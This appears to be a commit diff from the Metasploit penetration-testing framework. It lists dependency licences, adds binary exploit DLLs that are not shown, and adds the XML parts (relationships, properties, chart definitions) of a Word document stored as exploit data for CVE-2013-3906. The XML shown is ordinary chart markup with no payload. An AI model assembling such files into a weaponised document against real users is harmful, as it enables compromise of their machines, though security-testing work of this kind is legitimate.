Files: fivemat
Copyright: 2012 Tim Pope
License: MIT
Files: i18n
Copyright: 2008 The Ruby I18n team
License: MIT
Files: json
Copyright: Daniel Luz <dev at mernen dot com>
License: Ruby
Files: metasploit_data_models
Copyright: 2012 Rapid7, Inc.
License: MIT
Files: mini_portile
Copyright: 2011 Luis Lavena
License: MIT
Files: msgpack
Copyright: Austin Ziegler
License: Ruby
Files: multi_json
Copyright: 2010 Michael Bleigh, Josh Kalderimis, Erik Michaels-Ober, and Intridea, Inc.
License: MIT
Files: network_interface
Copyright: 2012, Rapid7, Inc.
License: MIT
Files: nokogiri
Copyright: 2008 - 2012 Aaron Patterson, Mike Dalessio, Charles Nutter, Sergio Arbeo, Patrick Mahoney, Yoko Harada
License: MIT
Files: packetfu
Copyright: 2008-2012 Tod Beardsley
License: BSD-3-clause
Files: pcaprub
Copyright: 2007-2008, Alastair Houghton
License: LGPL-2.1
Files: pg
Copyright: 1997-2012 by the authors
License: Ruby
Files: rake
Copyright: 2003, 2004 Jim Weirich
License: MIT
Files: redcarpet
Copyright: 2009 Natacha Porté
License: MIT
Files: robots
Copyright: 2008 Kyle Maxwell, contributors
License: MIT
Files: rspec
Copyright: 2009 Chad Humphries, David Chelimsky
License: MIT
Files: shoulda-matchers
Copyright: 2006-2013, Tammer Saleh, thoughtbot, inc.
License: MIT
Files: simplecov
Copyright: 2010-2012 Christoph Olszowka
License: MIT
Files: timecop
Copyright: 2012 Travis Jeffery, John Trupiano
License: MIT
Files: tzinfo
Copyright: 2005-2006 Philip Ross
License: MIT
Files: yard
Copyright: 2007-2013 Loren Segal
License: MIT
License: BSD-2-clause License: BSD-2-clause
Redistribution and use in source and binary forms, with or without modification, Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met: are permitted provided that the following conditions are met:

BIN
data/exploits/CVE-2010-0232/kitrap0d.x86.dll Executable file
View File

Binary file not shown.

BIN
data/exploits/CVE-2013-0109/nvidia_nvsvc.x86.dll Executable file
View File

Binary file not shown.

6
data/exploits/CVE-2013-3906/_rels/.rels Executable file
View File

@ -0,0 +1,6 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
<Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/extended-properties" Target="docProps/app.xml"/>
<Relationship Id="rId2" Type="http://schemas.openxmlformats.org/package/2006/relationships/metadata/core-properties" Target="docProps/core.xml"/>
<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocument" Target="word/document.xml"/>
</Relationships>

19
data/exploits/CVE-2013-3906/docProps/app.xml Executable file
View File

@ -0,0 +1,19 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/extended-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes">
<Template>Normal.dotm</Template>
<TotalTime>4</TotalTime>
<Pages>1</Pages>
<Words>217</Words>
<Characters>1238</Characters>
<Application>Microsoft Office Word</Application>
<DocSecurity>0</DocSecurity>
<Lines>10</Lines>
<Paragraphs>2</Paragraphs>
<ScaleCrop>false</ScaleCrop>
<Company>home</Company>
<LinksUpToDate>false</LinksUpToDate>
<CharactersWithSpaces>1453</CharactersWithSpaces>
<SharedDoc>false</SharedDoc>
<HyperlinksChanged>false</HyperlinksChanged>
<AppVersion>12.0000</AppVersion>
</Properties>

8
data/exploits/CVE-2013-3906/docProps/core.xml Executable file
View File

@ -0,0 +1,8 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<cp:coreProperties xmlns:cp="http://schemas.openxmlformats.org/package/2006/metadata/core-properties" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:dcterms="http://purl.org/dc/terms/" xmlns:dcmitype="http://purl.org/dc/dcmitype/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<dc:creator>Win7</dc:creator>
<cp:lastModifiedBy>Win7</cp:lastModifiedBy>
<cp:revision>1</cp:revision>
<dcterms:created xsi:type="dcterms:W3CDTF">2013-10-03T22:46:00Z</dcterms:created>
<dcterms:modified xsi:type="dcterms:W3CDTF">2013-10-03T23:17:00Z</dcterms:modified>
</cp:coreProperties>

4
data/exploits/CVE-2013-3906/word/charts/_rels/chart1.xml.rels Executable file
View File

@ -0,0 +1,4 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/package" Target="../embeddings/Microsoft_Office_Excel_Worksheet1.xlsx"/>
</Relationships>

4
data/exploits/CVE-2013-3906/word/charts/_rels/chart2.xml.rels Executable file
View File

@ -0,0 +1,4 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/package" Target="../embeddings/Microsoft_Office_Excel_Worksheet2.xlsx"/>
</Relationships>

4
data/exploits/CVE-2013-3906/word/charts/_rels/chart3.xml.rels Executable file
View File

@ -0,0 +1,4 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/package" Target="../embeddings/Microsoft_Office_Excel_Worksheet3.xlsx"/>
</Relationships>

4
data/exploits/CVE-2013-3906/word/charts/_rels/chart4.xml.rels Executable file
View File

@ -0,0 +1,4 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/package" Target="../embeddings/Microsoft_Office_Excel_Worksheet4.xlsx"/>
</Relationships>

4
data/exploits/CVE-2013-3906/word/charts/_rels/chart5.xml.rels Executable file
View File

@ -0,0 +1,4 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/package" Target="../embeddings/Microsoft_Office_Excel_Worksheet5.xlsx"/>
</Relationships>

4
data/exploits/CVE-2013-3906/word/charts/_rels/chart6.xml.rels Executable file
View File

@ -0,0 +1,4 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/package" Target="../embeddings/Microsoft_Office_Excel_Worksheet6.xlsx"/>
</Relationships>

230
data/exploits/CVE-2013-3906/word/charts/chart1.xml Executable file
View File

@ -0,0 +1,230 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<c:chartSpace xmlns:c="http://schemas.openxmlformats.org/drawingml/2006/chart" xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
<c:lang val="en-US"/>
<c:chart>
<c:view3D>
<c:perspective val="30"/>
</c:view3D>
<c:plotArea>
<c:layout/>
<c:bar3DChart>
<c:barDir val="col"/>
<c:grouping val="standard"/>
<c:ser>
<c:idx val="0"/>
<c:order val="0"/>
<c:tx>
<c:strRef>
<c:f>Sheet1!$B$1</c:f>
<c:strCache>
<c:ptCount val="1"/>
<c:pt idx="0">
<c:v>Series 1</c:v>
</c:pt>
</c:strCache>
</c:strRef>
</c:tx>
<c:cat>
<c:strRef>
<c:f>Sheet1!$A$2:$A$5</c:f>
<c:strCache>
<c:ptCount val="4"/>
<c:pt idx="0">
<c:v>Category 1</c:v>
</c:pt>
<c:pt idx="1">
<c:v>Category 2</c:v>
</c:pt>
<c:pt idx="2">
<c:v>Category 3</c:v>
</c:pt>
<c:pt idx="3">
<c:v>Category 4</c:v>
</c:pt>
</c:strCache>
</c:strRef>
</c:cat>
<c:val>
<c:numRef>
<c:f>Sheet1!$B$2:$B$5</c:f>
<c:numCache>
<c:formatCode>General</c:formatCode>
<c:ptCount val="4"/>
<c:pt idx="0">
<c:v>4.3</c:v>
</c:pt>
<c:pt idx="1">
<c:v>2.5</c:v>
</c:pt>
<c:pt idx="2">
<c:v>3.5</c:v>
</c:pt>
<c:pt idx="3">
<c:v>4.5</c:v>
</c:pt>
</c:numCache>
</c:numRef>
</c:val>
</c:ser>
<c:ser>
<c:idx val="1"/>
<c:order val="1"/>
<c:tx>
<c:strRef>
<c:f>Sheet1!$C$1</c:f>
<c:strCache>
<c:ptCount val="1"/>
<c:pt idx="0">
<c:v>Series 2</c:v>
</c:pt>
</c:strCache>
</c:strRef>
</c:tx>
<c:cat>
<c:strRef>
<c:f>Sheet1!$A$2:$A$5</c:f>
<c:strCache>
<c:ptCount val="4"/>
<c:pt idx="0">
<c:v>Category 1</c:v>
</c:pt>
<c:pt idx="1">
<c:v>Category 2</c:v>
</c:pt>
<c:pt idx="2">
<c:v>Category 3</c:v>
</c:pt>
<c:pt idx="3">
<c:v>Category 4</c:v>
</c:pt>
</c:strCache>
</c:strRef>
</c:cat>
<c:val>
<c:numRef>
<c:f>Sheet1!$C$2:$C$5</c:f>
<c:numCache>
<c:formatCode>General</c:formatCode>
<c:ptCount val="4"/>
<c:pt idx="0">
<c:v>2.4</c:v>
</c:pt>
<c:pt idx="1">
<c:v>4.4000000000000004</c:v>
</c:pt>
<c:pt idx="2">
<c:v>1.8</c:v>
</c:pt>
<c:pt idx="3">
<c:v>2.8</c:v>
</c:pt>
</c:numCache>
</c:numRef>
</c:val>
</c:ser>
<c:ser>
<c:idx val="2"/>
<c:order val="2"/>
<c:tx>
<c:strRef>
<c:f>Sheet1!$D$1</c:f>
<c:strCache>
<c:ptCount val="1"/>
<c:pt idx="0">
<c:v>Series 3</c:v>
</c:pt>
</c:strCache>
</c:strRef>
</c:tx>
<c:cat>
<c:strRef>
<c:f>Sheet1!$A$2:$A$5</c:f>
<c:strCache>
<c:ptCount val="4"/>
<c:pt idx="0">
<c:v>Category 1</c:v>
</c:pt>
<c:pt idx="1">
<c:v>Category 2</c:v>
</c:pt>
<c:pt idx="2">
<c:v>Category 3</c:v>
</c:pt>
<c:pt idx="3">
<c:v>Category 4</c:v>
</c:pt>
</c:strCache>
</c:strRef>
</c:cat>
<c:val>
<c:numRef>
<c:f>Sheet1!$D$2:$D$5</c:f>
<c:numCache>
<c:formatCode>General</c:formatCode>
<c:ptCount val="4"/>
<c:pt idx="0">
<c:v>2</c:v>
</c:pt>
<c:pt idx="1">
<c:v>2</c:v>
</c:pt>
<c:pt idx="2">
<c:v>3</c:v>
</c:pt>
<c:pt idx="3">
<c:v>5</c:v>
</c:pt>
</c:numCache>
</c:numRef>
</c:val>
</c:ser>
<c:shape val="cylinder"/>
<c:axId val="51657728"/>
<c:axId val="69190400"/>
<c:axId val="25292288"/>
</c:bar3DChart>
<c:catAx>
<c:axId val="51657728"/>
<c:scaling>
<c:orientation val="minMax"/>
</c:scaling>
<c:axPos val="b"/>
<c:tickLblPos val="nextTo"/>
<c:crossAx val="69190400"/>
<c:crosses val="autoZero"/>
<c:auto val="1"/>
<c:lblAlgn val="ctr"/>
<c:lblOffset val="100"/>
</c:catAx>
<c:valAx>
<c:axId val="69190400"/>
<c:scaling>
<c:orientation val="minMax"/>
</c:scaling>
<c:axPos val="l"/>
<c:majorGridlines/>
<c:numFmt formatCode="General" sourceLinked="1"/>
<c:tickLblPos val="nextTo"/>
<c:crossAx val="51657728"/>
<c:crosses val="autoZero"/>
<c:crossBetween val="between"/>
</c:valAx>
<c:serAx>
<c:axId val="25292288"/>
<c:scaling>
<c:orientation val="minMax"/>
</c:scaling>
<c:axPos val="b"/>
<c:tickLblPos val="nextTo"/>
<c:crossAx val="69190400"/>
<c:crosses val="autoZero"/>
</c:serAx>
</c:plotArea>
<c:legend>
<c:legendPos val="r"/>
<c:layout/>
</c:legend>
<c:plotVisOnly val="1"/>
</c:chart>
<c:externalData r:id="rId1"/>
</c:chartSpace>

220
data/exploits/CVE-2013-3906/word/charts/chart2.xml Executable file
View File

@ -0,0 +1,220 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<c:chartSpace xmlns:c="http://schemas.openxmlformats.org/drawingml/2006/chart" xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
<c:lang val="en-US"/>
<c:chart>
<c:view3D>
<c:rAngAx val="1"/>
</c:view3D>
<c:plotArea>
<c:layout/>
<c:bar3DChart>
<c:barDir val="col"/>
<c:grouping val="clustered"/>
<c:ser>
<c:idx val="0"/>
<c:order val="0"/>
<c:tx>
<c:strRef>
<c:f>Sheet1!$B$1</c:f>
<c:strCache>
<c:ptCount val="1"/>
<c:pt idx="0">
<c:v>Series 1</c:v>
</c:pt>
</c:strCache>
</c:strRef>
</c:tx>
<c:cat>
<c:strRef>
<c:f>Sheet1!$A$2:$A$5</c:f>
<c:strCache>
<c:ptCount val="4"/>
<c:pt idx="0">
<c:v>Category 1</c:v>
</c:pt>
<c:pt idx="1">
<c:v>Category 2</c:v>
</c:pt>
<c:pt idx="2">
<c:v>Category 3</c:v>
</c:pt>
<c:pt idx="3">
<c:v>Category 4</c:v>
</c:pt>
</c:strCache>
</c:strRef>
</c:cat>
<c:val>
<c:numRef>
<c:f>Sheet1!$B$2:$B$5</c:f>
<c:numCache>
<c:formatCode>General</c:formatCode>
<c:ptCount val="4"/>
<c:pt idx="0">
<c:v>4.3</c:v>
</c:pt>
<c:pt idx="1">
<c:v>2.5</c:v>
</c:pt>
<c:pt idx="2">
<c:v>3.5</c:v>
</c:pt>
<c:pt idx="3">
<c:v>4.5</c:v>
</c:pt>
</c:numCache>
</c:numRef>
</c:val>
</c:ser>
<c:ser>
<c:idx val="1"/>
<c:order val="1"/>
<c:tx>
<c:strRef>
<c:f>Sheet1!$C$1</c:f>
<c:strCache>
<c:ptCount val="1"/>
<c:pt idx="0">
<c:v>Series 2</c:v>
</c:pt>
</c:strCache>
</c:strRef>
</c:tx>
<c:cat>
<c:strRef>
<c:f>Sheet1!$A$2:$A$5</c:f>
<c:strCache>
<c:ptCount val="4"/>
<c:pt idx="0">
<c:v>Category 1</c:v>
</c:pt>
<c:pt idx="1">
<c:v>Category 2</c:v>
</c:pt>
<c:pt idx="2">
<c:v>Category 3</c:v>
</c:pt>
<c:pt idx="3">
<c:v>Category 4</c:v>
</c:pt>
</c:strCache>
</c:strRef>
</c:cat>
<c:val>
<c:numRef>
<c:f>Sheet1!$C$2:$C$5</c:f>
<c:numCache>
<c:formatCode>General</c:formatCode>
<c:ptCount val="4"/>
<c:pt idx="0">
<c:v>2.4</c:v>
</c:pt>
<c:pt idx="1">
<c:v>4.4000000000000004</c:v>
</c:pt>
<c:pt idx="2">
<c:v>1.8</c:v>
</c:pt>
<c:pt idx="3">
<c:v>2.8</c:v>
</c:pt>
</c:numCache>
</c:numRef>
</c:val>
</c:ser>
<c:ser>
<c:idx val="2"/>
<c:order val="2"/>
<c:tx>
<c:strRef>
<c:f>Sheet1!$D$1</c:f>
<c:strCache>
<c:ptCount val="1"/>
<c:pt idx="0">
<c:v>Series 3</c:v>
</c:pt>
</c:strCache>
</c:strRef>
</c:tx>
<c:cat>
<c:strRef>
<c:f>Sheet1!$A$2:$A$5</c:f>
<c:strCache>
<c:ptCount val="4"/>
<c:pt idx="0">
<c:v>Category 1</c:v>
</c:pt>
<c:pt idx="1">
<c:v>Category 2</c:v>
</c:pt>
<c:pt idx="2">
<c:v>Category 3</c:v>
</c:pt>
<c:pt idx="3">
<c:v>Category 4</c:v>
</c:pt>
</c:strCache>
</c:strRef>
</c:cat>
<c:val>
<c:numRef>
<c:f>Sheet1!$D$2:$D$5</c:f>
<c:numCache>
<c:formatCode>General</c:formatCode>
<c:ptCount val="4"/>
<c:pt idx="0">
<c:v>2</c:v>
</c:pt>
<c:pt idx="1">
<c:v>2</c:v>
</c:pt>
<c:pt idx="2">
<c:v>3</c:v>
</c:pt>
<c:pt idx="3">
<c:v>5</c:v>
</c:pt>
</c:numCache>
</c:numRef>
</c:val>
</c:ser>
<c:shape val="pyramid"/>
<c:axId val="71774208"/>
<c:axId val="71776128"/>
<c:axId val="0"/>
</c:bar3DChart>
<c:catAx>
<c:axId val="71774208"/>
<c:scaling>
<c:orientation val="minMax"/>
</c:scaling>
<c:axPos val="b"/>
<c:tickLblPos val="nextTo"/>
<c:crossAx val="71776128"/>
<c:crosses val="autoZero"/>
<c:auto val="1"/>
<c:lblAlgn val="ctr"/>
<c:lblOffset val="100"/>
</c:catAx>
<c:valAx>
<c:axId val="71776128"/>
<c:scaling>
<c:orientation val="minMax"/>
</c:scaling>
<c:axPos val="l"/>
<c:majorGridlines/>
<c:numFmt formatCode="General" sourceLinked="1"/>
<c:tickLblPos val="nextTo"/>
<c:crossAx val="71774208"/>
<c:crosses val="autoZero"/>
<c:crossBetween val="between"/>
</c:valAx>
</c:plotArea>
<c:legend>
<c:legendPos val="r"/>
<c:layout/>
</c:legend>
<c:plotVisOnly val="1"/>
</c:chart>
<c:externalData r:id="rId1"/>
</c:chartSpace>

230
data/exploits/CVE-2013-3906/word/charts/chart3.xml Executable file
View File

@ -0,0 +1,230 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<c:chartSpace xmlns:c="http://schemas.openxmlformats.org/drawingml/2006/chart" xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
<c:lang val="en-US"/>
<c:chart>
<c:view3D>
<c:perspective val="30"/>
</c:view3D>
<c:plotArea>
<c:layout/>
<c:bar3DChart>
<c:barDir val="col"/>
<c:grouping val="standard"/>
<c:ser>
<c:idx val="0"/>
<c:order val="0"/>
<c:tx>
<c:strRef>
<c:f>Sheet1!$B$1</c:f>
<c:strCache>
<c:ptCount val="1"/>
<c:pt idx="0">
<c:v>Series 1</c:v>
</c:pt>
</c:strCache>
</c:strRef>
</c:tx>
<c:cat>
<c:strRef>
<c:f>Sheet1!$A$2:$A$5</c:f>
<c:strCache>
<c:ptCount val="4"/>
<c:pt idx="0">
<c:v>Category 1</c:v>
</c:pt>
<c:pt idx="1">
<c:v>Category 2</c:v>
</c:pt>
<c:pt idx="2">
<c:v>Category 3</c:v>
</c:pt>
<c:pt idx="3">
<c:v>Category 4</c:v>
</c:pt>
</c:strCache>
</c:strRef>
</c:cat>
<c:val>
<c:numRef>
<c:f>Sheet1!$B$2:$B$5</c:f>
<c:numCache>
<c:formatCode>General</c:formatCode>
<c:ptCount val="4"/>
<c:pt idx="0">
<c:v>4.3</c:v>
</c:pt>
<c:pt idx="1">
<c:v>2.5</c:v>
</c:pt>
<c:pt idx="2">
<c:v>3.5</c:v>
</c:pt>
<c:pt idx="3">
<c:v>4.5</c:v>
</c:pt>
</c:numCache>
</c:numRef>
</c:val>
</c:ser>
<c:ser>
<c:idx val="1"/>
<c:order val="1"/>
<c:tx>
<c:strRef>
<c:f>Sheet1!$C$1</c:f>
<c:strCache>
<c:ptCount val="1"/>
<c:pt idx="0">
<c:v>Series 2</c:v>
</c:pt>
</c:strCache>
</c:strRef>
</c:tx>
<c:cat>
<c:strRef>
<c:f>Sheet1!$A$2:$A$5</c:f>
<c:strCache>
<c:ptCount val="4"/>
<c:pt idx="0">
<c:v>Category 1</c:v>
</c:pt>
<c:pt idx="1">
<c:v>Category 2</c:v>
</c:pt>
<c:pt idx="2">
<c:v>Category 3</c:v>
</c:pt>
<c:pt idx="3">
<c:v>Category 4</c:v>
</c:pt>
</c:strCache>
</c:strRef>
</c:cat>
<c:val>
<c:numRef>
<c:f>Sheet1!$C$2:$C$5</c:f>
<c:numCache>
<c:formatCode>General</c:formatCode>
<c:ptCount val="4"/>
<c:pt idx="0">
<c:v>2.4</c:v>
</c:pt>
<c:pt idx="1">
<c:v>4.4000000000000004</c:v>
</c:pt>
<c:pt idx="2">
<c:v>1.8</c:v>
</c:pt>
<c:pt idx="3">
<c:v>2.8</c:v>
</c:pt>
</c:numCache>
</c:numRef>
</c:val>
</c:ser>
<c:ser>
<c:idx val="2"/>
<c:order val="2"/>
<c:tx>
<c:strRef>
<c:f>Sheet1!$D$1</c:f>
<c:strCache>
<c:ptCount val="1"/>
<c:pt idx="0">
<c:v>Series 3</c:v>
</c:pt>
</c:strCache>
</c:strRef>
</c:tx>
<c:cat>
<c:strRef>
<c:f>Sheet1!$A$2:$A$5</c:f>
<c:strCache>
<c:ptCount val="4"/>
<c:pt idx="0">
<c:v>Category 1</c:v>
</c:pt>
<c:pt idx="1">
<c:v>Category 2</c:v>
</c:pt>
<c:pt idx="2">
<c:v>Category 3</c:v>
</c:pt>
<c:pt idx="3">
<c:v>Category 4</c:v>
</c:pt>
</c:strCache>
</c:strRef>
</c:cat>
<c:val>
<c:numRef>
<c:f>Sheet1!$D$2:$D$5</c:f>
<c:numCache>
<c:formatCode>General</c:formatCode>
<c:ptCount val="4"/>
<c:pt idx="0">
<c:v>2</c:v>
</c:pt>
<c:pt idx="1">
<c:v>2</c:v>
</c:pt>
<c:pt idx="2">
<c:v>3</c:v>
</c:pt>
<c:pt idx="3">
<c:v>5</c:v>
</c:pt>
</c:numCache>
</c:numRef>
</c:val>
</c:ser>
<c:shape val="pyramid"/>
<c:axId val="50252800"/>
<c:axId val="50255744"/>
<c:axId val="71870208"/>
</c:bar3DChart>
<c:catAx>
<c:axId val="50252800"/>
<c:scaling>
<c:orientation val="minMax"/>
</c:scaling>
<c:axPos val="b"/>
<c:tickLblPos val="nextTo"/>
<c:crossAx val="50255744"/>
<c:crosses val="autoZero"/>
<c:auto val="1"/>
<c:lblAlgn val="ctr"/>
<c:lblOffset val="100"/>
</c:catAx>
<c:valAx>
<c:axId val="50255744"/>
<c:scaling>
<c:orientation val="minMax"/>
</c:scaling>
<c:axPos val="l"/>
<c:majorGridlines/>
<c:numFmt formatCode="General" sourceLinked="1"/>
<c:tickLblPos val="nextTo"/>
<c:crossAx val="50252800"/>
<c:crosses val="autoZero"/>
<c:crossBetween val="between"/>
</c:valAx>
<c:serAx>
<c:axId val="71870208"/>
<c:scaling>
<c:orientation val="minMax"/>
</c:scaling>
<c:axPos val="b"/>
<c:tickLblPos val="nextTo"/>
<c:crossAx val="50255744"/>
<c:crosses val="autoZero"/>
</c:serAx>
</c:plotArea>
<c:legend>
<c:legendPos val="r"/>
<c:layout/>
</c:legend>
<c:plotVisOnly val="1"/>
</c:chart>
<c:externalData r:id="rId1"/>
</c:chartSpace>

110
data/exploits/CVE-2013-3906/word/charts/chart4.xml Executable file
View File

@ -0,0 +1,110 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<c:chartSpace xmlns:c="http://schemas.openxmlformats.org/drawingml/2006/chart" xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
<c:lang val="en-US"/>
<c:chart>
<c:title>
<c:layout/>
</c:title>
<c:view3D>
<c:rotX val="30"/>
<c:perspective val="30"/>
</c:view3D>
<c:plotArea>
<c:layout/>
<c:bar3DChart>
<c:barDir val="bar"/>
<c:grouping val="clustered"/>
<c:ser>
<c:idx val="0"/>
<c:order val="0"/>
<c:tx>
<c:strRef>
<c:f>Sheet1!$B$1</c:f>
<c:strCache>
<c:ptCount val="1"/>
<c:pt idx="0">
<c:v>Sales</c:v>
</c:pt>
</c:strCache>
</c:strRef>
</c:tx>
<c:cat>
<c:strRef>
<c:f>Sheet1!$A$2:$A$5</c:f>
<c:strCache>
<c:ptCount val="4"/>
<c:pt idx="0">
<c:v>Sq.. 1</c:v>
</c:pt>
<c:pt idx="1">
<c:v>Sq.. 2</c:v>
</c:pt>
<c:pt idx="2">
<c:v>Sq.. 3</c:v>
</c:pt>
<c:pt idx="3">
<c:v>Sq.. 4</c:v>
</c:pt>
</c:strCache>
</c:strRef>
</c:cat>
<c:val>
<c:numRef>
<c:f>Sheet1!$B$2:$B$5</c:f>
<c:numCache>
<c:formatCode>General</c:formatCode>
<c:ptCount val="4"/>
<c:pt idx="0">
<c:v>8.1999999999999993</c:v>
</c:pt>
<c:pt idx="1">
<c:v>3.2</c:v>
</c:pt>
<c:pt idx="2">
<c:v>1.4</c:v>
</c:pt>
<c:pt idx="3">
<c:v>1.2</c:v>
</c:pt>
</c:numCache>
</c:numRef>
</c:val>
</c:ser>
<c:shape val="box"/>
<c:axId val="50777472"/>
<c:axId val="50780032"/>
<c:axId val="0"/>
</c:bar3DChart>
<c:valAx>
<c:axId val="50780032"/>
<c:scaling>
<c:orientation val="minMax"/>
</c:scaling>
<c:axPos val="b"/>
<c:majorGridlines/>
<c:numFmt formatCode="General" sourceLinked="1"/>
<c:tickLblPos val="nextTo"/>
<c:crossAx val="50777472"/>
<c:crossBetween val="between"/>
</c:valAx>
<c:catAx>
<c:axId val="50777472"/>
<c:scaling>
<c:orientation val="minMax"/>
</c:scaling>
<c:axPos val="l"/>
<c:tickLblPos val="nextTo"/>
<c:crossAx val="50780032"/>
<c:auto val="1"/>
<c:lblAlgn val="ctr"/>
<c:lblOffset val="100"/>
</c:catAx>
</c:plotArea>
<c:legend>
<c:legendPos val="r"/>
<c:layout/>
</c:legend>
<c:plotVisOnly val="1"/>
</c:chart>
<c:externalData r:id="rId1"/>
</c:chartSpace>

228
data/exploits/CVE-2013-3906/word/charts/chart5.xml Executable file
View File

@ -0,0 +1,228 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<c:chartSpace xmlns:c="http://schemas.openxmlformats.org/drawingml/2006/chart" xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
<c:lang val="en-US"/>
<c:chart>
<c:view3D>
<c:perspective val="30"/>
</c:view3D>
<c:plotArea>
<c:layout/>
<c:line3DChart>
<c:grouping val="standard"/>
<c:ser>
<c:idx val="0"/>
<c:order val="0"/>
<c:tx>
<c:strRef>
<c:f>Sheet1!$B$1</c:f>
<c:strCache>
<c:ptCount val="1"/>
<c:pt idx="0">
<c:v>Series 1</c:v>
</c:pt>
</c:strCache>
</c:strRef>
</c:tx>
<c:cat>
<c:strRef>
<c:f>Sheet1!$A$2:$A$5</c:f>
<c:strCache>
<c:ptCount val="4"/>
<c:pt idx="0">
<c:v>Category 1</c:v>
</c:pt>
<c:pt idx="1">
<c:v>Category 2</c:v>
</c:pt>
<c:pt idx="2">
<c:v>Category 3</c:v>
</c:pt>
<c:pt idx="3">
<c:v>Category 4</c:v>
</c:pt>
</c:strCache>
</c:strRef>
</c:cat>
<c:val>
<c:numRef>
<c:f>Sheet1!$B$2:$B$5</c:f>
<c:numCache>
<c:formatCode>General</c:formatCode>
<c:ptCount val="4"/>
<c:pt idx="0">
<c:v>4.3</c:v>
</c:pt>
<c:pt idx="1">
<c:v>2.5</c:v>
</c:pt>
<c:pt idx="2">
<c:v>3.5</c:v>
</c:pt>
<c:pt idx="3">
<c:v>4.5</c:v>
</c:pt>
</c:numCache>
</c:numRef>
</c:val>
</c:ser>
<c:ser>
<c:idx val="1"/>
<c:order val="1"/>
<c:tx>
<c:strRef>
<c:f>Sheet1!$C$1</c:f>
<c:strCache>
<c:ptCount val="1"/>
<c:pt idx="0">
<c:v>Series 2</c:v>
</c:pt>
</c:strCache>
</c:strRef>
</c:tx>
<c:cat>
<c:strRef>
<c:f>Sheet1!$A$2:$A$5</c:f>
<c:strCache>
<c:ptCount val="4"/>
<c:pt idx="0">
<c:v>Category 1</c:v>
</c:pt>
<c:pt idx="1">
<c:v>Category 2</c:v>
</c:pt>
<c:pt idx="2">
<c:v>Category 3</c:v>
</c:pt>
<c:pt idx="3">
<c:v>Category 4</c:v>
</c:pt>
</c:strCache>
</c:strRef>
</c:cat>
<c:val>
<c:numRef>
<c:f>Sheet1!$C$2:$C$5</c:f>
<c:numCache>
<c:formatCode>General</c:formatCode>
<c:ptCount val="4"/>
<c:pt idx="0">
<c:v>2.4</c:v>
</c:pt>
<c:pt idx="1">
<c:v>4.4000000000000004</c:v>
</c:pt>
<c:pt idx="2">
<c:v>1.8</c:v>
</c:pt>
<c:pt idx="3">
<c:v>2.8</c:v>
</c:pt>
</c:numCache>
</c:numRef>
</c:val>
</c:ser>
<c:ser>
<c:idx val="2"/>
<c:order val="2"/>
<c:tx>
<c:strRef>
<c:f>Sheet1!$D$1</c:f>
<c:strCache>
<c:ptCount val="1"/>
<c:pt idx="0">
<c:v>Series 3</c:v>
</c:pt>
</c:strCache>
</c:strRef>
</c:tx>
<c:cat>
<c:strRef>
<c:f>Sheet1!$A$2:$A$5</c:f>
<c:strCache>
<c:ptCount val="4"/>
<c:pt idx="0">
<c:v>Category 1</c:v>
</c:pt>
<c:pt idx="1">
<c:v>Category 2</c:v>
</c:pt>
<c:pt idx="2">
<c:v>Category 3</c:v>
</c:pt>
<c:pt idx="3">
<c:v>Category 4</c:v>
</c:pt>
</c:strCache>
</c:strRef>
</c:cat>
<c:val>
<c:numRef>
<c:f>Sheet1!$D$2:$D$5</c:f>
<c:numCache>
<c:formatCode>General</c:formatCode>
<c:ptCount val="4"/>
<c:pt idx="0">
<c:v>2</c:v>
</c:pt>
<c:pt idx="1">
<c:v>2</c:v>
</c:pt>
<c:pt idx="2">
<c:v>3</c:v>
</c:pt>
<c:pt idx="3">
<c:v>5</c:v>
</c:pt>
</c:numCache>
</c:numRef>
</c:val>
